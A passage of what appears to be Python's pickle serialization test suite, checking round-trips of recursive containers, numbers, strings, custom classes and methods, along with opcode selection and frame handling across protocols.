self.assertIsInstance(x, dict)
self.assertEqual(len(x.keys()), 1)
self.assertIsInstance(list(x.keys())[0], K)
self.assertIs(list(x.keys())[0].value, x)
def test_recursive_set(self):
y = set()
k = K(y)
y.add(k)
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, set)
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], K)
self.assertIs(list(x)[0].value, x)
def test_recursive_list_subclass(self):
y = MyList()
y.append(y)
for proto in range(2, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, MyList)
self.assertEqual(len(x), 1)
self.assertIs(x[0], x)
def test_recursive_dict_subclass(self):
d = MyDict()
d[1] = d
for proto in range(2, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, MyDict)
self.assertEqual(list(x.keys()), [1])
self.assertIs(x[1], x)
def test_recursive_dict_subclass_key(self):
d = MyDict()
k = K(d)
d[k] = 1
for proto in range(2, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, MyDict)
self.assertEqual(len(list(x.keys())), 1)
self.assertIsInstance(list(x.keys())[0], K)
self.assertIs(list(x.keys())[0].value, x)
def test_recursive_inst(self):
i = C()
i.attr = i
for proto in protocols:
s = self.dumps(i, proto)
x = self.loads(s)
self.assertIsInstance(x, C)
self.assertEqual(dir(x), dir(i))
self.assertIs(x.attr, x)
def test_recursive_multi(self):
l = []
d = {1:l}
i = C()
i.attr = d
l.append(i)
for proto in protocols:
s = self.dumps(l, proto)
x = self.loads(s)
self.assertIsInstance(x, list)
self.assertEqual(len(x), 1)
self.assertEqual(dir(x[0]), dir(i))
self.assertEqual(list(x[0].attr.keys()), [1])
self.assertTrue(x[0].attr[1] is x)
def check_recursive_collection_and_inst(self, factory):
h = H()
y = factory([h])
h.attr = y
for proto in protocols:
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, type(y))
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], H)
self.assertIs(list(x)[0].attr, x)
def test_recursive_list_and_inst(self):
self.check_recursive_collection_and_inst(list)
def test_recursive_tuple_and_inst(self):
self.check_recursive_collection_and_inst(tuple)
def test_recursive_dict_and_inst(self):
self.check_recursive_collection_and_inst(dict.fromkeys)
def test_recursive_set_and_inst(self):
self.check_recursive_collection_and_inst(set)
def test_recursive_frozenset_and_inst(self):
self.check_recursive_collection_and_inst(frozenset)
def test_recursive_list_subclass_and_inst(self):
self.check_recursive_collection_and_inst(MyList)
def test_recursive_tuple_subclass_and_inst(self):
self.check_recursive_collection_and_inst(MyTuple)
def test_recursive_dict_subclass_and_inst(self):
self.check_recursive_collection_and_inst(MyDict.fromkeys)
def test_recursive_set_subclass_and_inst(self):
self.check_recursive_collection_and_inst(MySet)
def test_recursive_frozenset_subclass_and_inst(self):
self.check_recursive_collection_and_inst(MyFrozenSet)
def test_unicode(self):
endcases = ['', '<\\u>', '<\\\u1234>', '<\n>',
'<\\>', '<\\\U00012345>',
# surrogates
'<\udc80>']
for proto in protocols:
for u in endcases:
p = self.dumps(u, proto)
u2 = self.loads(p)
self.assert_is_copy(u, u2)
def test_unicode_high_plane(self):
t = '\U00012345'
for proto in protocols:
p = self.dumps(t, proto)
t2 = self.loads(p)
self.assert_is_copy(t, t2)
def test_bytes(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
for s in [bytes([i]) for i in range(256)]:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
for s in [bytes([i, i]) for i in range(256)]:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
def test_bytearray(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
b = bytearray(s)
p = self.dumps(b, proto)
bb = self.loads(p)
self.assertIsNot(bb, b)
self.assert_is_copy(b, bb)
if proto <= 3:
# bytearray is serialized using a global reference
self.assertIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.GLOBAL, p))
elif proto == 4:
self.assertIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.STACK_GLOBAL, p))
elif proto == 5:
self.assertNotIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.BYTEARRAY8, p))
def test_ints(self):
for proto in protocols:
n = sys.maxsize
while n:
for expected in (-n, n):
s = self.dumps(expected, proto)
n2 = self.loads(s)
self.assert_is_copy(expected, n2)
n = n >> 1
def test_long(self):
for proto in protocols:
# 256 bytes is where LONG4 begins.
for nbits in 1, 8, 8*254, 8*255, 8*256, 8*257:
nbase = 1 << nbits
for npos in nbase-1, nbase, nbase+1:
for n in npos, -npos:
pickle = self.dumps(n, proto)
got = self.loads(pickle)
self.assert_is_copy(n, got)
# Try a monster. This is quadratic-time in protos 0 & 1, so don't
# bother with those.
nbase = int("deadbeeffeedface", 16)
nbase += nbase << 1000000
for n in nbase, -nbase:
p = self.dumps(n, 2)
got = self.loads(p)
# assert_is_copy is very expensive here as it precomputes
# a failure message by computing the repr() of n and got,
# we just do the check ourselves.
self.assertIs(type(got), int)
self.assertEqual(n, got)
def test_float(self):
test_values = [0.0, 4.94e-324, 1e-310, 7e-308, 6.626e-34, 0.1, 0.5,
3.14, 263.44582062374053, 6.022e23, 1e30]
test_values = test_values + [-x for x in test_values]
for proto in protocols:
for value in test_values:
pickle = self.dumps(value, proto)
got = self.loads(pickle)
self.assert_is_copy(value, got)
@run_with_locale('LC_ALL', 'de_DE', 'fr_FR')
def test_float_format(self):
# make sure that floats are formatted locale independent with proto 0
self.assertEqual(self.dumps(1.2, 0)[0:3], b'F1.')
def test_reduce(self):
for proto in protocols:
inst = AAA()
dumped = self.dumps(inst, proto)
loaded = self.loads(dumped)
self.assertEqual(loaded, REDUCE_A)
def test_getinitargs(self):
for proto in protocols:
inst = initarg(1, 2)
dumped = self.dumps(inst, proto)
loaded = self.loads(dumped)
self.assert_is_copy(inst, loaded)
def test_metaclass(self):
a = use_metaclass()
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a.__class__, b.__class__)
def test_dynamic_class(self):
a = create_dynamic_class("my_dynamic_class", (object,))
copyreg.pickle(pickling_metaclass, pickling_metaclass.__reduce__)
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a, b)
self.assertIs(type(a), type(b))
def test_structseq(self):
import time
import os
t = time.localtime()
for proto in protocols:
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
t = os.stat(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
if hasattr(os, "statvfs"):
t = os.statvfs(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
def test_ellipsis(self):
for proto in protocols:
s = self.dumps(..., proto)
u = self.loads(s)
self.assertIs(..., u)
def test_notimplemented(self):
for proto in protocols:
s = self.dumps(NotImplemented, proto)
u = self.loads(s)
self.assertIs(NotImplemented, u)
def test_singleton_types(self):
# Issue #6477: Test that types of built-in singletons can be pickled.
singletons = [None, ..., NotImplemented]
for singleton in singletons:
for proto in protocols:
s = self.dumps(type(singleton), proto)
u = self.loads(s)
self.assertIs(type(singleton), u)
# Tests for protocol 2
def test_proto(self):
for proto in protocols:
pickled = self.dumps(None, proto)
if proto >= 2:
proto_header = pickle.PROTO + bytes([proto])
self.assertTrue(pickled.startswith(proto_header))
else:
self.assertEqual(count_opcode(pickle.PROTO, pickled), 0)
oob = protocols[-1] + 1 # a future protocol
build_none = pickle.NONE + pickle.STOP
badpickle = pickle.PROTO + bytes([oob]) + build_none
try:
self.loads(badpickle)
except ValueError as err:
self.assertIn("unsupported pickle protocol", str(err))
else:
self.fail("expected bad protocol number to raise ValueError")
def test_long1(self):
x = 12345678910111213141516178920
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG1, s), proto >= 2)
def test_long4(self):
x = 12345678910111213141516178920 << (256*8)
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG4, s), proto >= 2)
def test_short_tuples(self):
# Map (proto, len(tuple)) to expected opcode.
expected_opcode = {(0, 0): pickle.TUPLE,
(0, 1): pickle.TUPLE,
(0, 2): pickle.TUPLE,
(0, 3): pickle.TUPLE,
(0, 4): pickle.TUPLE,
(1, 0): pickle.EMPTY_TUPLE,
(1, 1): pickle.TUPLE,
(1, 2): pickle.TUPLE,
(1, 3): pickle.TUPLE,
(1, 4): pickle.TUPLE,
(2, 0): pickle.EMPTY_TUPLE,
(2, 1): pickle.TUPLE1,
(2, 2): pickle.TUPLE2,
(2, 3): pickle.TUPLE3,
(2, 4): pickle.TUPLE,
(3, 0): pickle.EMPTY_TUPLE,
(3, 1): pickle.TUPLE1,
(3, 2): pickle.TUPLE2,
(3, 3): pickle.TUPLE3,
(3, 4): pickle.TUPLE,
}
a = ()
b = (1,)
c = (1, 2)
d = (1, 2, 3)
e = (1, 2, 3, 4)
for proto in protocols:
for x in a, b, c, d, e:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
expected = expected_opcode[min(proto, 3), len(x)]
self.assertTrue(opcode_in_pickle(expected, s))
def test_singletons(self):
# Map (proto, singleton) to expected opcode.
expected_opcode = {(0, None): pickle.NONE,
(1, None): pickle.NONE,
(2, None): pickle.NONE,
(3, None): pickle.NONE,
(0, True): pickle.INT,
(1, True): pickle.INT,
(2, True): pickle.NEWTRUE,
(3, True): pickle.NEWTRUE,
(0, False): pickle.INT,
(1, False): pickle.INT,
(2, False): pickle.NEWFALSE,
(3, False): pickle.NEWFALSE,
}
for proto in protocols:
for x in None, False, True:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertTrue(x is y, (proto, x, s, y))
expected = expected_opcode[min(proto, 3), x]
self.assertTrue(opcode_in_pickle(expected, s))
def test_newobj_tuple(self):
x = MyTuple([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_newobj_list(self):
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_newobj_generic(self):
for proto in protocols:
for C in myclasses:
B = C.__base__
x = C(C.sample)
x.foo = 42
s = self.dumps(x, proto)
y = self.loads(s)
detail = (proto, C, B, x, y, type(y))
self.assert_is_copy(x, y) # XXX revisit
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
def test_newobj_proxies(self):
# NEWOBJ should use the __class__ rather than the raw type
classes = myclasses[:]
# Cannot create weakproxies to these classes
for c in (MyInt, MyTuple):
classes.remove(c)
for proto in protocols:
for C in classes:
B = C.__base__
x = C(C.sample)
x.foo = 42
p = weakref.proxy(x)
s = self.dumps(p, proto)
y = self.loads(s)
self.assertEqual(type(y), type(x)) # rather than type(p)
detail = (proto, C, B, x, y, type(y))
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
def test_newobj_not_class(self):
# Issue 24552
global SimpleNewObj
save = SimpleNewObj
o = SimpleNewObj.__new__(SimpleNewObj)
b = self.dumps(o, 4)
try:
SimpleNewObj = 42
self.assertRaises((TypeError, pickle.UnpicklingError), self.loads, b)
finally:
SimpleNewObj = save
# Register a type with copyreg, with extension code extcode. Pickle
# an object of that type. Check that the resulting pickle uses opcode
# (EXT[124]) under proto 2, and not in proto 1.
def produce_global_ext(self, extcode, opcode):
e = ExtensionSaver(extcode)
try:
copyreg.add_extension(__name__, "MyList", extcode)
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
# Dump using protocol 1 for comparison.
s1 = self.dumps(x, 1)
self.assertIn(__name__.encode("utf-8"), s1)
self.assertIn(b"MyList", s1)
self.assertFalse(opcode_in_pickle(opcode, s1))
y = self.loads(s1)
self.assert_is_copy(x, y)
# Dump using protocol 2 for test.
s2 = self.dumps(x, 2)
self.assertNotIn(__name__.encode("utf-8"), s2)
self.assertNotIn(b"MyList", s2)
self.assertEqual(opcode_in_pickle(opcode, s2), True, repr(s2))
y = self.loads(s2)
self.assert_is_copy(x, y)
finally:
e.restore()
def test_global_ext1(self):
self.produce_global_ext(0x00000001, pickle.EXT1) # smallest EXT1 code
self.produce_global_ext(0x000000ff, pickle.EXT1) # largest EXT1 code
def test_global_ext2(self):
self.produce_global_ext(0x00000100, pickle.EXT2) # smallest EXT2 code
self.produce_global_ext(0x0000ffff, pickle.EXT2) # largest EXT2 code
self.produce_global_ext(0x0000abcd, pickle.EXT2) # check endianness
def test_global_ext4(self):
self.produce_global_ext(0x00010000, pickle.EXT4) # smallest EXT4 code
self.produce_global_ext(0x7fffffff, pickle.EXT4) # largest EXT4 code
self.produce_global_ext(0x12abcdef, pickle.EXT4) # check endianness
def test_list_chunking(self):
n = 10 # too small to chunk
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
self.assertEqual(num_appends, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
if proto == 0:
self.assertEqual(num_appends, 0)
else:
self.assertTrue(num_appends >= 2)
def test_dict_chunking(self):
n = 10 # too small to chunk
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
self.assertIsInstance(s, bytes_types)
y = self.loads(s)
self.assert_is_copy(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
self.assertEqual(num_setitems, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
if proto == 0:
self.assertEqual(num_setitems, 0)
else:
self.assertTrue(num_setitems >= 2)
def test_set_chunking(self):
n = 10 # too small to chunk
x = set(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_additems = count_opcode(pickle.ADDITEMS, s)
if proto < 4:
self.assertEqual(num_additems, 0)
else:
self.assertEqual(num_additems, 1)
n = 2500 # expect at least two chunks when proto >= 4
x = set(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_additems = count_opcode(pickle.ADDITEMS, s)
if proto < 4:
self.assertEqual(num_additems, 0)
else:
self.assertGreaterEqual(num_additems, 2)
def test_simple_newobj(self):
x = SimpleNewObj.__new__(SimpleNewObj, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
else:
self.assertIn(b'M\xce\xfa', s) # BININT2
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s),
2 <= proto)
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ_EX, s))
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_complex_newobj(self):
x = ComplexNewObj.__new__(ComplexNewObj, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
elif proto < 2:
self.assertIn(b'M\xce\xfa', s) # BININT2
elif proto < 4:
self.assertIn(b'X\x04\x00\x00\x00FACE', s) # BINUNICODE
else:
self.assertIn(b'\x8c\x04FACE', s) # SHORT_BINUNICODE
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s),
2 <= proto)
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ_EX, s))
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_complex_newobj_ex(self):
x = ComplexNewObjEx.__new__(ComplexNewObjEx, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
elif proto < 2:
self.assertIn(b'M\xce\xfa', s) # BININT2
elif proto < 4:
self.assertIn(b'X\x04\x00\x00\x00FACE', s) # BINUNICODE
else:
self.assertIn(b'\x8c\x04FACE', s) # SHORT_BINUNICODE
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ, s))
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ_EX, s),
4 <= proto)
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_newobj_list_slots(self):
x = SlotList([1, 2, 3])
x.foo = 42
x.bar = "hello"
s = self.dumps(x, 2)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_reduce_overrides_default_reduce_ex(self):
for proto in protocols:
x = REX_one()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 0)
def test_reduce_ex_called(self):
for proto in protocols:
x = REX_two()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_overrides_reduce(self):
for proto in protocols:
x = REX_three()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_calls_base(self):
for proto in protocols:
x = REX_four()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, proto)
def test_reduce_calls_base(self):
for proto in protocols:
x = REX_five()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 1)
@no_tracing
def test_bad_getattr(self):
# Issue #3514: crash when there is an infinite loop in __getattr__
x = BadGetattr()
for proto in protocols:
self.assertRaises(RuntimeError, self.dumps, x, proto)
def test_reduce_bad_iterator(self):
# Issue4176: crash when 4th and 5th items of __reduce__()
# are not iterators
class C(object):
def __reduce__(self):
# 4th item is not an iterator
return list, (), None, [], None
class D(object):
def __reduce__(self):
# 5th item is not an iterator
return dict, (), None, None, []
# Python implementation is less strict and also accepts iterables.
for proto in protocols:
try:
self.dumps(C(), proto)
except pickle.PicklingError:
pass
try:
self.dumps(D(), proto)
except pickle.PicklingError:
pass
def test_many_puts_and_gets(self):
# Test that internal data structures correctly deal with lots of
# puts/gets.
keys = ("aaa" + str(i) for i in range(100))
large_dict = dict((k, [4, 5, 6]) for k in keys)
obj = [dict(large_dict), dict(large_dict), dict(large_dict)]
for proto in protocols:
with self.subTest(proto=proto):
dumped = self.dumps(obj, proto)
loaded = self.loads(dumped)
self.assert_is_copy(obj, loaded)
def test_attribute_name_interning(self):
# Test that attribute names of pickled objects are interned when
# unpickling.
for proto in protocols:
x = C()
x.foo = 42
x.bar = "hello"
s = self.dumps(x, proto)
y = self.loads(s)
x_keys = sorted(x.__dict__)
y_keys = sorted(y.__dict__)
for x_key, y_key in zip(x_keys, y_keys):
self.assertIs(x_key, y_key)
def test_pickle_to_2x(self):
# Pickle non-trivial data with protocol 2, expecting that it yields
# the same result as Python 2.x did.
# NOTE: this test is a bit too strong since we can produce different
# bytecode that 2.x will still understand.
dumped = self.dumps(range(5), 2)
self.assertEqual(dumped, DATA_XRANGE)
dumped = self.dumps(set([3]), 2)
self.assertEqual(dumped, DATA_SET2)
def test_large_pickles(self):
# Test the correctness of internal buffering routines when handling
# large data.
for proto in protocols:
data = (1, min, b'xy' * (30 * 1024), len)
dumped = self.dumps(data, proto)
loaded = self.loads(dumped)
self.assertEqual(len(loaded), len(data))
self.assertEqual(loaded, data)
def test_int_pickling_efficiency(self):
# Test compacity of int representation (see issue #12744)
for proto in protocols:
with self.subTest(proto=proto):
pickles = [self.dumps(2**n, proto) for n in range(70)]
sizes = list(map(len, pickles))
# the size function is monotonic
self.assertEqual(sorted(sizes), sizes)
if proto >= 2:
for p in pickles:
self.assertFalse(opcode_in_pickle(pickle.LONG, p))
def _check_pickling_with_opcode(self, obj, opcode, proto):
pickled = self.dumps(obj, proto)
self.assertTrue(opcode_in_pickle(opcode, pickled))
unpickled = self.loads(pickled)
self.assertEqual(obj, unpickled)
def test_appends_on_non_lists(self):
# Issue #17720
obj = REX_six([1, 2, 3])
for proto in protocols:
if proto == 0:
self._check_pickling_with_opcode(obj, pickle.APPEND, proto)
else:
self._check_pickling_with_opcode(obj, pickle.APPENDS, proto)
def test_setitems_on_non_dicts(self):
obj = REX_seven({1: -1, 2: -2, 3: -3})
for proto in protocols:
if proto == 0:
self._check_pickling_with_opcode(obj, pickle.SETITEM, proto)
else:
self._check_pickling_with_opcode(obj, pickle.SETITEMS, proto)
# Exercise framing (proto >= 4) for significant workloads
FRAME_SIZE_MIN = 4
FRAME_SIZE_TARGET = 64 * 1024
def check_frame_opcodes(self, pickled):
"""
Check the arguments of FRAME opcodes in a protocol 4+ pickle.
Note that binary objects that are larger than FRAME_SIZE_TARGET are not
framed by default and are therefore considered a frame by themselves in
the following consistency check.
"""
frame_end = frameless_start = None
frameless_opcodes = {'BINBYTES', 'BINUNICODE', 'BINBYTES8',
'BINUNICODE8', 'BYTEARRAY8'}
for op, arg, pos in pickletools.genops(pickled):
if frame_end is not None:
self.assertLessEqual(pos, frame_end)
if pos == frame_end:
frame_end = None
if frame_end is not None: # framed
self.assertNotEqual(op.name, 'FRAME')
if op.name in frameless_opcodes:
# Only short bytes and str objects should be written
# in a frame
self.assertLessEqual(len(arg), self.FRAME_SIZE_TARGET)
else: # not framed
if (op.name == 'FRAME' or
(op.name in frameless_opcodes and
len(arg) > self.FRAME_SIZE_TARGET)):
# Frame or large bytes or str object
if frameless_start is not None:
# Only short data should be written outside of a frame
self.assertLess(pos - frameless_start,
self.FRAME_SIZE_MIN)
frameless_start = None
elif frameless_start is None and op.name != 'PROTO':
frameless_start = pos
if op.name == 'FRAME':
self.assertGreaterEqual(arg, self.FRAME_SIZE_MIN)
frame_end = pos + 9 + arg
pos = len(pickled)
if frame_end is not None:
self.assertEqual(frame_end, pos)
elif frameless_start is not None:
self.assertLess(pos - frameless_start, self.FRAME_SIZE_MIN)
def test_framing_many_objects(self):
obj = list(range(10**5))
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
pickled = self.dumps(obj, proto)
unpickled = self.loads(pickled)
self.assertEqual(obj, unpickled)
bytes_per_frame = (len(pickled) /
count_opcode(pickle.FRAME, pickled))
self.assertGreater(bytes_per_frame,
self.FRAME_SIZE_TARGET / 2)
self.assertLessEqual(bytes_per_frame,
self.FRAME_SIZE_TARGET * 1)
self.check_frame_opcodes(pickled)
def test_framing_large_objects(self):
N = 1024 * 1024
small_items = [[i] for i in range(10)]
obj = [b'x' * N, *small_items, b'y' * N, 'z' * N]
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
for fast in [False, True]:
with self.subTest(proto=proto, fast=fast):
if not fast:
# fast=False by default.
# This covers in-memory pickling with pickle.dumps().
pickled = self.dumps(obj, proto)
else:
# Pickler is required when fast=True.
if not hasattr(self, 'pickler'):
continue
buf = io.BytesIO()
pickler = self.pickler(buf, protocol=proto)
pickler.fast = fast
pickler.dump(obj)
pickled = buf.getvalue()
unpickled = self.loads(pickled)
# More informative error message in case of failure.
self.assertEqual([len(x) for x in obj],
[len(x) for x in unpickled])
# Perform full equality check if the lengths match.
self.assertEqual(obj, unpickled)
n_frames = count_opcode(pickle.FRAME, pickled)
# A single frame for small objects between
# first two large objects.
self.assertEqual(n_frames, 1)
self.check_frame_opcodes(pickled)
def test_optional_frames(self):
if pickle.HIGHEST_PROTOCOL < 4:
return
def remove_frames(pickled, keep_frame=None):
"""Remove frame opcodes from the given pickle."""
frame_starts = []
# 1 byte for the opcode and 8 for the argument
frame_opcode_size = 9
for opcode, _, pos in pickletools.genops(pickled):
if opcode.name == 'FRAME':
frame_starts.append(pos)
newpickle = bytearray()
last_frame_end = 0
for i, pos in enumerate(frame_starts):
if keep_frame and keep_frame(i):
continue
newpickle += pickled[last_frame_end:pos]
last_frame_end = pos + frame_opcode_size
newpickle += pickled[last_frame_end:]
return newpickle
frame_size = self.FRAME_SIZE_TARGET
num_frames = 20
# Large byte objects (dict values) intermittent with small objects
# (dict keys)
for bytes_type in (bytes, bytearray):
obj = {i: bytes_type([i]) * frame_size for i in range(num_frames)}
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
pickled = self.dumps(obj, proto)
frameless_pickle = remove_frames(pickled)
self.assertEqual(count_opcode(pickle.FRAME, frameless_pickle), 0)
self.assertEqual(obj, self.loads(frameless_pickle))
some_frames_pickle = remove_frames(pickled, lambda i: i % 2)
self.assertLess(count_opcode(pickle.FRAME, some_frames_pickle),
count_opcode(pickle.FRAME, pickled))
self.assertEqual(obj, self.loads(some_frames_pickle))
def test_framed_write_sizes_with_delayed_writer(self):
class ChunkAccumulator:
"""Accumulate pickler output in a list of raw chunks."""
def __init__(self):
self.chunks = []
def write(self, chunk):
self.chunks.append(chunk)
def concatenate_chunks(self):
return b"".join(self.chunks)
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
objects = [(str(i).encode('ascii'), i % 42, {'i': str(i)})
for i in range(int(1e4))]
# Add a large unique ASCII string
objects.append('0123456789abcdef' *
(self.FRAME_SIZE_TARGET // 16 + 1))
# Protocol 4 packs groups of small objects into frames and issues
# calls to write only once or twice per frame:
# The C pickler issues one call to write per-frame (header and
# contents) while Python pickler issues two calls to write: one for
# the frame header and one for the frame binary contents.
writer = ChunkAccumulator()
self.pickler(writer, proto).dump(objects)
# Actually read the binary content of the chunks after the end
# of the call to dump: any memoryview passed to write should not
# be released otherwise this delayed access would not be possible.
pickled = writer.concatenate_chunks()
reconstructed = self.loads(pickled)
self.assertEqual(reconstructed, objects)
self.assertGreater(len(writer.chunks), 1)
# memoryviews should own the memory.
del objects
support.gc_collect()
self.assertEqual(writer.concatenate_chunks(), pickled)
n_frames = (len(pickled) - 1) // self.FRAME_SIZE_TARGET + 1
# There should be at least one call to write per frame
self.assertGreaterEqual(len(writer.chunks), n_frames)
# but not too many either: there can be one for the proto,
# one per-frame header, one per frame for the actual contents,
# and two for the header.
self.assertLessEqual(len(writer.chunks), 2 * n_frames + 3)
chunk_sizes = [len(c) for c in writer.chunks]
large_sizes = [s for s in chunk_sizes
if s >= self.FRAME_SIZE_TARGET]
medium_sizes = [s for s in chunk_sizes
if 9 < s < self.FRAME_SIZE_TARGET]
small_sizes = [s for s in chunk_sizes if s <= 9]
# Large chunks should not be too large:
for chunk_size in large_sizes:
self.assertLess(chunk_size, 2 * self.FRAME_SIZE_TARGET,
chunk_sizes)
# There shouldn't bee too many small chunks: the protocol header,
# the frame headers and the large string headers are written
# in small chunks.
self.assertLessEqual(len(small_sizes),
len(large_sizes) + len(medium_sizes) + 3,
chunk_sizes)
def test_nested_names(self):
global Nested
class Nested:
class A:
class B:
class C:
pass
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for obj in [Nested.A, Nested.A.B, Nested.A.B.C]:
with self.subTest(proto=proto, obj=obj):
unpickled = self.loads(self.dumps(obj, proto))
self.assertIs(obj, unpickled)
def test_recursive_nested_names(self):
global Recursive
class Recursive:
pass
Recursive.mod = sys.modules[Recursive.__module__]
Recursive.__qualname__ = 'Recursive.mod.Recursive'
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
unpickled = self.loads(self.dumps(Recursive, proto))
self.assertIs(unpickled, Recursive)
del Recursive.mod # break reference loop
def test_py_methods(self):
global PyMethodsTest
class PyMethodsTest:
@staticmethod
def cheese():
return "cheese"
@classmethod
def wine(cls):
assert cls is PyMethodsTest
return "wine"
def biscuits(self):
assert isinstance(self, PyMethodsTest)
return "biscuits"
class Nested:
"Nested class"
@staticmethod
def ketchup():
return "ketchup"
@classmethod
def maple(cls):
assert cls is PyMethodsTest.Nested
return "maple"
def pie(self):
assert isinstance(self, PyMethodsTest.Nested)
return "pie"
py_methods = (
PyMethodsTest.cheese,
PyMethodsTest.wine,
PyMethodsTest().biscuits,
PyMethodsTest.Nested.ketchup,
PyMethodsTest.Nested.maple,
PyMethodsTest.Nested().pie
)
py_unbound_methods = (
(PyMethodsTest.biscuits, PyMethodsTest),
(PyMethodsTest.Nested.pie, PyMethodsTest.Nested)
)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for method in py_methods:
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(), unpickled())
for method, cls in py_unbound_methods:
obj = cls()
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(obj), unpickled(obj))
def test_c_methods(self):
global Subclass
class Subclass(tuple):
class Nested(str):
pass
c_methods = (
# bound built-in method
("abcd".index, ("c",)),
# unbound built-in method
(str.index, ("abcd", "c")),
# bound "slot" method
([1, 2, 3].__len__, ()),
# unbound "slot" method
(list.__len__, ([1, 2, 3],)),
# bound "coexist" method
({1, 2}.__contains__, (2,)),
# unbound "coexist" method
(set.__contains__, ({1, 2}, 2)),
# built-in class method
